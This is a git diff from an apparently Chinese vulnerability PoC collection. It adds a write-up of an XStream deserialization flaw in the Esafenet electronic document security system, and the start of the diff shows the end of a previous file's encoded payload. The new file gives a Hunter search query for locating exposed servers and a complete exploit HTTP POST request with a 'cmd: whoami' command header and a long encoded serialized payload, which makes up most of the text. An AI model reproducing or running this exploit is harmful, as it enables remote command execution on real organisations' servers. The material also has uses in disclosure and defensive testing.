PPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606393838-c5eba968-6491-4e25-882f-daeb8e717359.png](./img/pAmvocl6LiMwYXO4/1706606393838-c5eba968-6491-4e25-882f-daeb8e717359-967129.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xzm0hwy8gkg8e5nl>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..985f2b5
--- /dev/null
+++ b/亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/GjCIUT029FqNfeNV/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-452307.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/OfflineApplicationService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNO